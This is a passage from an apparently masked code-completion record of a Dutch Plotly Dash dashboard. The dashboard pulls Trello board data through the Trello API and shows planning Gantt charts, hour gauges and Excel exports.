gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltanextmonth *\n 0.5], 'color': '#3deb34'}, {'range': [deltanextmonth * 0.5, \n deltanextmonth * 0.75], 'color': '#b4eb34'}, {'range': [\n deltanextmonth * 0.75, deltanextmonth * 0.9], 'color': '#ebb434'},\n {'range': [deltanextmonth * 0.9, deltanextmonth], 'color':\n '#eb6e34'}, {'range': [deltanextmonth, gaugerangenextmonth],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}}\n gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},\n 'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltatwomonths *\n 0.5], 'color': '#3deb34'}, {'range': [deltatwomonths * 0.5, \n deltatwomonths * 0.75], 'color': '#b4eb34'}, {'range': [\n deltatwomonths * 0.75, deltatwomonths * 0.9], 'color': '#ebb434'},\n {'range': [deltatwomonths * 0.9, deltatwomonths], 'color':\n '#eb6e34'}, {'range': [deltatwomonths, gaugerangetwomonths],\n 'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',\n 'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}}\n gaugefig = go.Figure()\n gaugefig.add_trace(go.Indicator(domain={'x': [0, 0.3], 'y': [0, 1]},\n value=gaugegeplandthismonth, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(thismonth, '%Y%m').\n strftime('%B')}, delta={'reference': deltathismonth}, gauge=\n gaugestepsthismonth))\n gaugefig.add_trace(go.Indicator(domain={'x': [0.35, 0.65], 'y': [0, 1]},\n value=gaugegeplandnextmonth, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(nextmonth, '%Y%m').\n strftime('%B')}, delta={'reference': deltanextmonth}, gauge=\n gaugestepsnextmonth))\n gaugefig.add_trace(go.Indicator(domain={'x': [0.7, 1], 'y': [0, 1]},\n value=gaugegeplandtwomonths, mode='gauge+number+delta', title={\n 'text': 'Totale uren voor ' + datetime.strptime(twomonths, '%Y%m').\n strftime('%B')}, delta={'reference': deltatwomonths}, gauge=\n gaugestepstwomonths))\n gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars,\n 'gaugefig': gaugefig}\n columntypes = {}\n for key, value in kaarten[next(iter(kaarten))].items():\n if 'datum' in key or key == 'Aangemaakt':\n columntypes[key] = 'datetime'\n elif type(value) == int:\n columntypes[key] = 'numeric'\n elif type(value in [str, bool]):\n columntypes[key] = 'text'\n columntypesurenpermaand = dict(columntypes)\n columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})\n data = {'kaarten': kaarten, 'arrays': arrays, 'urenperdagperkaart':\n urenperdagperkaart, 'beschikbareuren': beschikbareuren, 'graphdata':\n graphdata, 'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,\n 'columntypes': columntypes, 'urenpermaand': pd.DataFrame(data=\n dfurenpermaand).T, 'columntypesurenpermaand': columntypesurenpermaand}}\n\n\ndef make_layout():\n return html.Div(className='First Div', children=[html.Div(style={\n 'font-style': 'italic', 'font-weight': 'bold', 'border': '10px',\n 'box-shadow': '8px 8px 8px grey', 'background': 'rgb(149,193,31)',\n 'background':\n 'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)'\n , 'margin-top': '1%', 'margin-bottom': '1%', 'margin-right': '1%',\n 'margin-left': '1%', 'border-radius': '10px', 'text-align':\n 'center'}, className='Banner', children=[html.Div(style={'display':\n 'inline-block', 'width': '80%'}, children=[html.H1(\n 'Trello borden USD')]), html.Div(style={'display': 'inline-block',\n 'margin-right': '1px'}, children=[html.Img(src=app.get_asset_url(\n 'logonop.png'), style={'width': '150px', 'margin-right': '0px'})])]\n ), html.H5('Kies hieronder een bord', style={'text-align': 'center'\n }), dcc.Dropdown(id='dropdown_boards', options=[{'label': i['name'],\n 'value': i['id']} for i in boards], value=boards[0]['id']), html.\n Button('Data verversen', id='refreshdatabtn', n_clicks=0), html.Div\n (id='test')])\n\n\n<mask token>\n\n\n@app.callback(Output('test', 'children'), [Input('dropdown_boards', 'value'\n ), Input('refreshdatabtn', 'n_clicks')])\ndef create_maindiv(value, n_clicks):\n get_data(value)\n import os\n if os.name == 'nt':\n daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')\n else:\n daterefreshed = datetime.strftime(datetime.now(), '%A %-d %B, %H:%M')\n return html.Div(className='', children=[dcc.Markdown(\n '**Laatst ververst: **' + daterefreshed), dcc.Tabs(className='Tabs',\n children=[dcc.Tab(label='Gantt charts', style=globals['styles'][\n 'tabs'], children=[html.Div(className='tab2_div1', style=globals[\n 'styles']['maindivs'], children=[html.H3('Uitleg'), html.Div(style=\n globals['styles']['divgraphs'], children=[dcc.Markdown(\n 'In dit tabblad worden de kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'\n )])]), html.Div(className='tab2_div2', style=globals['styles'][\n 'maindivs'], children=[html.H4('Gantt per epic'), dcc.Dropdown(\n style=globals['styles']['dropdowns'], id='dropdownganttepics',\n options=[{'label': name, 'value': name} for name in data['arrays'][\n 'epics']], value=[next(iter(data['arrays']['epics']))]), html.Div(\n style=globals['styles']['divgraphs'], children=[dcc.Graph(id=\n 'ganttepics')])]), html.Div(className='tab2_div3', style=globals[\n 'styles']['maindivs'], children=[html.H4('Gantt per persoon'), dcc.\n Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdownganttpersoon', options=[{'label': name, 'value': name} for\n name in data['arrays'][config.get('Custom Field for Person')]]),\n dcc.Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdownganttpersoonstatus', options=[{'label': name, 'value':\n name} for name in data['arrays']['statuses']], value=data['arrays']\n ['statuses'], multi=True), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Graph(id='ganttpersoon')])])]), dcc.Tab\n (label='Data export', style=globals['styles']['tabs'], children=[\n html.Div(className='tab3_div1', style=globals['styles']['maindivs'],\n children=[html.H3('Uitleg'), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Markdown(\n \"Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand.\"\n ), dcc.Markdown(\n \"In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. Kies dan de velden, filter daarna en klik op 'Export'.\"\n )])]), html.Div(className='tab3_div2', style=globals['styles'][\n 'maindivs'], children=[html.H4('Platte dump'), dcc.Markdown(\n 'Deze tabel laat de platte data zien, zoals in Trello gevuld.'),\n dash_table.DataTable(id='table_plattedump', columns=[{'name': i,\n 'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable': \n True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']\n ['columntypes'].keys()], data=data['dfs']['kaartendf'].to_dict(\n 'records'), hidden_columns=[i for i in data['dfs']['columntypes']],\n export_format='xlsx', export_headers='display', export_columns=\n 'all', filter_action='native', sort_action='native', sort_mode=\n 'multi', style_table={'overflowX': 'scroll'}, style_header={\n 'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',\n 'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={\n 'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',\n 'text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'})]),\n html.Div(className='tab3_div3', style=globals['styles']['maindivs'],\n children=[html.H4('Uren per maand'), dcc.Markdown(\n 'Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'\n ), dcc.Markdown(\n 'Ook hierin kan gefilterd worden. filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'\n ), dash_table.DataTable(id='table_urenpermaand', columns=[{'name':\n i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i),\n 'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in\n data['dfs']['columntypesurenpermaand'].keys()], data=data['dfs'][\n 'urenpermaand'].to_dict('records'), hidden_columns=[i for i in data\n ['dfs']['columntypesurenpermaand']], export_format='xlsx',\n export_headers='display', export_columns='all', filter_action=\n 'native', sort_action='native', sort_mode='multi', style_header={\n 'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',\n 'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={\n 'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',\n 'text-align': 'left', 'fontFamily': 'Arial'})])]), dcc.Tab(label=\n 'Langetermijnplanning', style=globals['styles']['tabs'], children=[\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H3('Uitleg'), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Markdown(\n 'In dit tabblad wordt een langetermijnplanning getoond.'), dcc.\n Markdown('De focus hierbij ligt vooral op de categorieen.')])]),\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H4('Ingeplande uren per categorie'), dcc.Dropdown(\n style=globals['styles']['dropdowns'], id='dropdownurenpermaand',\n options=[{'label': name, 'value': name} for name in data['arrays'][\n config.get('Custom Field for Categories')] if name != None], multi=\n True, searchable=False, value=data['arrays'][config.get(\n 'Custom Field for Categories')]), html.Div(style=globals['styles'][\n 'divgraphs'], children=[dcc.Graph(id='urenpermaand')])]), html.Div(\n className='tab1_div3', style=globals['styles']['maindivs'],\n children=[html.H4('Nog in te plannen uren (per lijst)'), dcc.\n Markdown(\n '*Nieuw* zijn werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'\n ), dcc.Markdown(\n '*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'\n ), dcc.Markdown(\n '*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'), dcc.\n Markdown(\n '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(id='graph_nietingepland', figure={'data': data['graphdata'][\n 'nietingepland'], 'layout': globals['graphlayouts']['bars']})])]),\n html.Div(className='tab1_div4', style=globals['styles']['maindivs'],\n children=[html.H4('Nog in te plannen uren (per epic)'), dcc.\n Markdown(\n '**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(id='graph_nietingepland_epics', figure={'data': data[\n 'graphdata']['nietingeplandepics'], 'layout': globals[\n 'graphlayouts']['bars']})])])]), dcc.Tab(style=globals['styles'][\n 'tabs'], label='Tactische planning', children=[html.Div(className=\n 'maindivs', style=globals['styles']['maindivs'], children=[html.H3(\n 'Uitleg'), dcc.Markdown(\n 'In dit tabblad is een middellange termijnplanning te zien.')]),\n html.Div(className='maindivs', style=globals['styles']['maindivs'],\n children=[html.H4('Totalen'), dcc.Markdown(\n 'Hieronder staan twee totaaloverzichten van de aankomende maanden.'\n ), dcc.Markdown(\n 'De blauwe balk geeft de ingeplande uren weer. De streep geeft de beschikbare uren aan.'\n ), dcc.Markdown(\n 'Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'\n ), html.Div(style=globals['styles']['divgraphs'], children=[dcc.\n Graph(figure=data['graphdata']['gaugefig'])])]), html.Div(className\n ='maindivs', style=globals['styles']['maindivs'], children=[html.H4\n ('Gantt'), dcc.Dropdown(style=globals['styles']['dropdowns'], id=\n 'dropdowngantttactisch', options=[{'label': j, 'value': i} for i, j in\n data['arrays']['threemonths']], multi=False, searchable=False,\n value=data['arrays']['threemonths'][0][0]), html.Div(style=globals[\n 'styles']['divgraphs'], children=[dcc.Graph(id='gantttactisch')])])\n ])])])\n\n\n@app.callback(Output('gantttactisch', 'figure'), [Input(\n 'dropdowngantttactisch', 'value')])\ndef update_gantttactisch(v1):\n if v1 != None:\n if v1[4:] == '12':\n v1plus1 = str(int(v1[0:4]) + 1) + '01'\n else:\n v1plus1 = str(int(v1) + 1)\n if v1[4:] == '01':\n v1min1 = str(int(v1[0:4]) - 1) + '12'\n else:\n v1min1 = str(int(v1) - 1)\n if v1[4:] == '11':\n v1plus2 = str(int(v1[0:4]) + 1) + '01'\n else:\n v1plus2 = str(int(v1) + 2)\n import random\n import numpy as np\n from operator import itemgetter\n ganttdata = []\n monthkey = int(v1)\n for i, j in data['kaarten'].items():\n if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:\n try:\n if int(datetime.strftime(j['Begindatum'], '%Y%m')\n ) <= monthkey and int(datetime.strftime(j[\n 'Einddatum'], '%Y%m')) >= monthkey:\n if j['Begindatum'].date() < datetime.strptime(\n v1min1 + '01', '%Y%m%d').date():\n start = datetime.strptime(v1min1 + '01', '%Y%m%d'\n ).date()\n else:\n start = j['Begindatum'].date()\n if j['Einddatum'].date() >= datetime.strptime(\n v1plus2 + '01', '%Y%m%d').date():\n eind = datetime.strptime(v1plus2 + '01', '%Y%m%d'\n ).date()\n else:\n eind = j['Einddatum'].date()\n ganttdata.append(dict(Task=j['Epic'], Start=start,\n Finish=eind, Resource=j['Naam'] + ' (uren: ' +\n str(round(data['urenperdagperkaart'][j['Naam']]\n ['urenperperiode'][v1])) + ')'))\n except:\n pass\n result = sorted(ganttdata, key=itemgetter('Task'))\n rgb = []\n for c in range(len(result)):\n r = list(np.random.choice(range(256), size=3))\n s2 = ','.join(map(str, r))\n s1 = 'rgb('\n s3 = ')'\n rgb.append(s1 + s2 + s3)\n fig = ff.create_gantt(result, index_col='Resource', show_colorbar=\n True, group_tasks=False, showgrid_x=True, showgrid_y=True,\n colors=rgb)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n fig.add_trace(go.Scatter(mode='lines', x=[v1[0:4] + '-' + v1[4:] +\n '-01', v1[0:4] + '-' + v1[4:] + '-01'], y=[-1, len(result)],\n line={'shape': 'spline', 'color': 'black', 'width': 4},\n showlegend=False))\n fig.add_trace(go.Scatter(mode='lines', x=[v1plus1[0:4] + '-' +\n v1plus1[4:] + '-01', v1plus1[0:4] + '-' + v1plus1[4:] + '-01'],\n y=[-1, len(result)], line={'shape': 'spline', 'color': 'black',\n 'width': 4}, showlegend=False))\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('ganttpersoon', 'figure'), [Input(\n 'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',\n 'value')])\ndef update_ganttpersoon(v1, v2):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j[config.get('Custom Field for Person')] == v1 and j['Status'\n ] != 'Archived' and j['Status'] in v2:\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Epic']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('ganttepics', 'figure'), [Input('dropdownganttepics',\n 'value')])\ndef update_ganttepics(value):\n ganttdata = []\n for i, j in data['kaarten'].items():\n if j['Epic'] == value and j['Status'] != 'Archived':\n try:\n ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(\n 'Custom Field for Starting date')].date(), Finish=j[\n config.get('Custom Field for Ending date')].date(),\n Resource=j['Status']))\n except:\n pass\n if ganttdata != []:\n fig = ff.create_gantt(ganttdata, index_col='Resource',\n show_colorbar=True, showgrid_x=True, showgrid_y=True)\n fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)')\n return fig\n else:\n return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=\n 'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}\n\n\n@app.callback(Output('urenpermaand', 'figure'), [Input(\n 'dropdownurenpermaand', 'value')])\ndef update_urenpermaand(value):\n layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=\n 'rgba(0,0,0,0)', xaxis={'title': 'Datum', 'gridcolor': 'gray'},\n yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})\n bars = []\n if 'Regulier werk' in value:\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in\n data['urenperdagperkaart'].values() if value[config.get(\n 'Custom Field for Categories')] == 'Regulier werk']), 0))\n bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis, name=\n 'Regulier werk', line={'shape': 'spline', 'smoothing': 0.4},\n mode='lines+markers', marker={'symbol': 'triangle-up-open',\n 'size': 10}, stackgroup='one'))\n for categorie in data['arrays'][config.get('Custom Field for Categories')]:\n if categorie in value and categorie != 'Regulier werk':\n if categorie == None:\n categorienaam = 'Geen categorie'\n else:\n categorienaam = categorie\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for\n value in data['urenperdagperkaart'].values() if value[\n config.get('Custom Field for Categories')] == categorie\n ]), 0))\n bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis,\n name=categorienaam, line={'shape': 'spline', 'smoothing': \n 0.4}, mode='lines+markers', marker={'symbol':\n 'triangle-up-open', 'size': 10}, stackgroup='one'))\n yaxis = []\n for i in data['arrays']['perioden']:\n yaxis.append(round(sum([value['urenperperiode'][i] for value in\n data['beschikbareuren'].values()]), 0))\n bars.append(dict(name='Totaal beschikbare uren', mode='lines', x=data[\n 'arrays']['xaxis_months'], y=yaxis, size=10, line={'shape':\n 'spline', 'smoothing': 0.3, 'width': 6, 'color': 'black'}))\n return {'data': bars, 'layout': layout}\n\n\n@app.server.route('/dash/configuration/')\ndef download_file():\n return flask.send_file('./configuration/configuration.txt',\n attachment_filename='configuration.txt', as_attachment=True,\n cache_timeout=0)\n\n\n<mask token>\n",
"step-3": "<mask token>\ntry:\n with open('./configuration/credentials.txt') as json_file:\n credentials = json.load(json_file)\n with open('./configuration/configuration.txt') as json_file:\n config = json.load(json_file)\nexcept:\n raise Exception('Draai eerst deploy.py!')\nlocale = locale.setlocale(locale.LC_ALL, 'nl_NL.UTF-8')\nglobals = {'config': config, 'credentials': credentials, 'styles': {}}\nboard_url = ('https://api.trello.com/1/members/me/boards?fields=name&key=' +\n credentials.get('API key') + '&token=' + credentials.get('API token'))\nboards = json.loads(json.dumps(requests.get(board_url).json()))\nglobals['boards'] = boards\nglobals['styles']['maindivs'] = {'box-shadow': '8px 8px 8px grey',\n 'background-image': \"url('./assets/left.png')\", 'background-repeat':\n 'no-repeat', 'background-position': '0px 0px', 'margin-top': '1%',\n 'margin-bottom': '1%', 'margin-left': '1%', 'margin-right': '1%',\n 'text-align': 'center', 'border-radius': '10px'}\nglobals['styles']['tabs'] = {'border-style': 'solid', 'border-width': '2px',\n 'background': 'rgb(255,255,255)', 'background':\n 'radial-gradient(circle, rgba(255,255,255,1) 0%, rgba(162,162,162,1) 100%, rgba(255,255,255,1) 100%)'\n , 'margin-top': '5px', 'margin-bottom': '5px', 'margin-right': '5px',\n 'margin-left': '5px', 'border-radius': '6px'}\nglobals['styles']['divgraphs'] = {'background-color':\n 'rgba(62,182,235,0.1)', 'margin-top': '1%', 'margin-bottom': '2%',\n 'margin-left': '1%', 'margin-right': '1%', 'text-align': 'center',\n 'border-radius': '10px'}\nglobals['styles']['dropdowns'] = {'margin-left': '1%', 'margin-right': '2%'}\nglobals['graphlayouts'] = {'bars': go.Layout(barmode='stack', paper_bgcolor\n ='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)', hovermode='closest')}\n\n\ndef get_data(value):\n global data\n global config\n with open('./configuration/configuration.txt') as json_file:\n configfile = json.load(json_file)\n config = configfile.get(value)\n keys = 'key=' + credentials.get('API key') + '&token=' + credentials.get(\n 'API token')\n trello_base_url = 'https://api.trello.com/1/'\n board_url = trello_base_url + 'boards/' + value\n url_cards = (board_url +\n '?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&'\n + keys)\n url_lists = board_url + '/lists?filter=all&' + keys\n url_customfields = board_url + '/customFields?' + keys\n url_labels = board_url + '/labels?' + keys\n url_members = board_url + '/members?' + keys\n board = json.loads(json.dumps(requests.get(url_cards).json()))\n lists = json.loads(json.dumps(requests.get(url_lists).json()))\n customfields = json.loads(json.dumps(requests.get(url_customfields).json())\n )\n labels = json.loads(json.dumps(requests.get(url_labels).json()))\n members = json.loads(json.dumps(requests.get(url_members).json()))\n cards = board['cards']\n\n def dateCalc(date):\n try:\n newdate = datetime.strptime(date[0:19], '%Y-%m-%dT%H:%M:%S')\n return newdate\n except:\n return None\n customfields_dict = {'date': {}, 'list': {}, 'text': {}, 'number': {},\n 'checkbox': {}}\n for i in customfields:\n customfields_dict[i['type']] = {}\n for i in customfields:\n customfields_dict[i['type']][i['id']] = {}\n for i in customfields:\n if i['type'] == 'list':\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n customfields_dict['list'][i['id']]['options'] = {}\n for j in i['options']:\n customfields_dict['list'][i['id']]['options'][j['id']] = j[\n 'value'].get('text')\n else:\n customfields_dict[i['type']][i['id']]['name'] = i['name']\n chosenlists = []\n for i in config.get('Not Started'):\n chosenlists.append(i)\n chosenlists.extend(config.get('Blocked'))\n chosenlists.extend(config.get('Doing'))\n chosenlists.extend(config.get('Done'))\n for i in config.get('Epics'):\n chosenlists.append(i)\n for i in config.get('Always continuing'):\n chosenlists.append(i)\n for i in config.get('List with Epics Done'):\n chosenlists.append(i)\n\n def idtodate(cardid):\n hex = cardid[0:8]\n timestamp = int(hex, 16)\n timedate = datetime.fromtimestamp(timestamp)\n return timedate\n\n def get_epicid(url):\n try:\n if 'epicId=' in url:\n start = url.find('epicId=') + 7\n end = url.find('&attachmentId=')\n return url[start:end]\n else:\n pass\n except:\n pass\n kaarten = {i['id']: {'Naam': i['name'], 'KaartID': i['id'], 'ListID': i\n ['idList'], 'customfields': i['customFieldItems'], 'Aangemaakt':\n idtodate(i['id']), 'labels': [label['name'] for label in i['labels'\n ] if i['labels'] != []], 'members': [member['fullName'] for member in\n members if member['id'] in i['idMembers']], 'Sjabloon': i[\n 'isTemplate'], 'Vervaldatum': dateCalc(i['due']), 'Gearchiveerd': i\n ['closed'], 'epicid': [get_epicid(j['url']) for j in i[\n 'attachments']], 'Epic': None, 'shortUrl': i['shortUrl']} for i in\n cards}\n for i, j in kaarten.items():\n while None in j['epicid']:\n j['epicid'].remove(None)\n if j['members'] != []:\n j['Leden'] = ''\n for k in j['members']:\n if j['Leden'] == '':\n j['Leden'] += k\n else:\n j['Leden'] += ', ' + k\n else:\n j['Leden'] = None\n del j['members']\n if customfields_dict != {}:\n for i, j in customfields_dict.items():\n for k, l in j.items():\n for m, n in kaarten.items():\n n[l['name']] = None\n for i, j in kaarten.items():\n for k in j['customfields']:\n if k['idCustomField'] in customfields_dict['list'].keys():\n j[customfields_dict['list'][k['idCustomField']].get('name')\n ] = customfields_dict['list'][k['idCustomField']][\n 'options'].get(k['idValue'])\n elif k['idCustomField'] in customfields_dict['checkbox'].keys(\n ):\n if k['value']['checked'] == 'true':\n j[customfields_dict['checkbox'][k['idCustomField']]\n .get('name')] = True\n else:\n j[customfields_dict['checkbox'][k['idCustomField']]\n .get('name')] = False\n elif k['idCustomField'] in customfields_dict['date'].keys():\n j[customfields_dict['date'][k['idCustomField']].get('name')\n ] = dateCalc(k['value'].get('date'))\n else:\n for key in k['value']:\n j[customfields_dict[key][k['idCustomField']].get(\n 'name')] = k['value'].get(key)\n epicIdNameCategory = []\n for i, j in kaarten.items():\n epicIdNameCategory.append((i, j['Naam'], j[config.get(\n 'Custom Field for Categories')]))\n for i, j in kaarten.items():\n if j['epicid'] == []:\n j['Epic'] = 'Geen epic'\n j['Categorie'] = None\n else:\n for k in epicIdNameCategory:\n if k[0] == j['epicid'][0]:\n j['Epic'] = k[1]\n j['Categorie'] = k[2]\n del j['epicid']\n for i, j in kaarten.items():\n for k in lists:\n if j['ListID'] == k['id']:\n j['Lijst'] = k['name']\n if j['Lijst'] in config.get('Not Started'):\n j['Status'] = 'Niet gestart'\n elif j['Lijst'] in config.get('Doing'):\n j['Status'] = 'Doing'\n elif j['Lijst'] in config.get('Blocked'):\n j['Status'] = 'Blocked'\n elif j['Lijst'] in config.get('Done'):\n j['Status'] = 'Done'\n elif j['Lijst'] in config.get('Always continuing'):\n j['Status'] = 'Doorlopend'\n elif j['Lijst'] in config.get('Epics'):\n j['Status'] = 'Epics Doing'\n elif j['Lijst'] in config.get('List with Epics Done'):\n j['Status'] = 'Epics Done'\n else:\n j['Status'] = 'Archived'\n del j['customfields']\n del j['ListID']\n for i, j in kaarten.items():\n if j['Gearchiveerd'] == True and j['Status'] != 'Done':\n j['Status'] = 'Archived'\n liststodelete = []\n for i in lists:\n if i['name'] not in chosenlists:\n liststodelete.append(i['name'])\n cardstodelete = []\n for i, j in kaarten.items():\n if j['Sjabloon'] == True:\n cardstodelete.append(i)\n elif j['Lijst'] in liststodelete:\n cardstodelete.append(i)\n hours = {}\n for i, j in kaarten.items():\n if j['Lijst'] == config.get('List for hours'):\n hours[j['Naam']] = {config['Custom Field for Starting date']: j\n [config['Custom Field for Starting date']], config[\n 'Custom Field for Ending date']: j[config[\n 'Custom Field for Ending date']], config[\n 'Custom Field with hours']: j[config[\n 'Custom Field with hours']]}\n for i in cardstodelete:\n if i in kaarten:\n del kaarten[i]\n tmpdatesdict = {}\n now = datetime.now().date()\n numdays = 365\n numdayshistory = 183\n for x in range(0, numdays):\n tmpdatesdict[str(now + timedelta(days=x))] = {}\n for x in range(0, numdayshistory):\n tmpdatesdict[str(now - timedelta(days=x))] = {}\n dates = []\n for i in sorted(tmpdatesdict):\n dates.append(i)\n arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten\n .values()])), 'xaxis_months': list(dict.fromkeys([(i[0:4] + '-' + i\n [5:7] + '-01') for i in dates])), 'perioden': list(dict.fromkeys([(\n i[0:4] + i[5:7]) for i in dates])), 'statuses': list(dict.fromkeys(\n [card['Status'] for card in kaarten.values()])), config.get(\n 'Custom Field for Categories'): list(dict.fromkeys([card[config.get\n ('Custom Field for Categories')] for card in kaarten.values()])),\n config.get('Custom Field for Person'): list(dict.fromkeys([(card[\n config.get('Custom Field for Person')] if card[config.get(\n 'Custom Field for Person')] != None else 'Geen ' + config.get(\n 'Custom Field for Person')) for card in kaarten.values()]))}\n try:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.\n get('Custom Field for Starting date'): kaart[config.get(\n 'Custom Field for Starting date')], config.get(\n 'Custom Field for Ending date'): kaart[config.get(\n 'Custom Field for Ending date')], 'Gebied': kaart['Gebied'],\n config.get('Custom Field for Person'): kaart[config.get(\n 'Custom Field for Person')], config.get(\n 'Custom Field for Categories'): kaart[config.get(\n 'Custom Field for Categories')], config.get(\n 'Custom Field with hours'): kaart[config.get(\n 'Custom Field with hours')], 'Cognosrapport': kaart[\n 'Cognosrapport'], 'Niet meenemen in telling': kaart[\n 'Niet meenemen in telling'], 'Lijst': kaart['Lijst'], 'Status':\n kaart['Status'], 'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for\n kaart in kaarten.values()}\n except:\n urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],\n 'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],\n 'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.\n get('Custom Field for Starting date'): kaart[config.get(\n 'Custom Field for Starting date')], config.get(\n 'Custom Field for Ending date'): kaart[config.get(\n 'Custom Field for Ending date')], config.get(\n 'Custom Field for Person'): kaart[config.get(\n 'Custom Field for Person')], config.get(\n 'Custom Field for Categories'): kaart[config.get(\n 'Custom Field for Categories')], config.get(\n 'Custom Field with hours'): kaart[config.get(\n 'Custom Field with hours')], 'Lijst': kaart['Lijst'], 'Status':\n kaart['Status'], 'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for\n kaart in kaarten.values()}\n beschikbareuren = {key: {'urenperdag': {i: (0) for i in dates},\n 'urenperperiode': {i: (0) for i in arrays['perioden']}} for key in\n hours.keys()}\n for i in dates:\n datekey = datetime.strptime(i, '%Y-%m-%d').date()\n for k, l in kaarten.items():\n if l['Niet meenemen in telling'] != True:\n try:\n if l[config.get('Custom Field for Starting date')].date(\n ) < datekey <= l[config.get(\n 'Custom Field for Ending date')].date():\n delta = l[config.get('Custom Field for Ending date')\n ] - l[config.get('Custom Field for Starting date')]\n hoursperday = int(l[config.get(\n 'Custom Field with hours')]) / int(delta.days)\n urenperdagperkaart[l['Naam']]['urenperdag'][i\n ] = hoursperday\n except:\n pass\n for k, l in hours.items():\n try:\n if l[config.get('Custom Field for Starting date')].date(\n ) < datekey <= l[config.get('Custom Field for 